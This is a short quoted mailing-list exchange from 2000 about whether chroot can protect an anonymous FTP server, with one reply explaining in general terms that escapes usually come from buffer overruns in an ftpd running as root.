On Mon, 31 Jan 2000, Steffen Dettmer wrote:
* Sebastian Seitz wrote on Sun, Jan 30, 2000 at 21:52 +0100:
stopping the not-so-experienced users. And even the experienced ones would need a little of time to break it. I won't have anything really valuable on
Thats crap. Im able to break chroot with >10 lines of code in the sploid. Second thing: you have to put ls ins /usr/local/ftp/bin too and its needet libaries in /usr/local/ftp/lib...
Is that that easy? I'm surprised! (But what means "sploid"?) I think he meant exploit.
Do you say, that you can break a chroot'ed anonymous FTP Server with a little piece of code? How should that work? I though, the kernel offers defnitly no chanche for a process, to break a chroot? The usual exploit is a buffer overrun that-- for lack of a better term-- hijacks the ftpd process and executes shell code as that processes UID and whatnot; since ftpd runs on port 21, it generally is run as root. Although i'm a lousy programmer, I think that the "break chroot" is more of a condition of a faulty anonymous ftpd setup than an inherent flaw in chroot(), which will only work as long as the program doesn't get buffer overran.
dan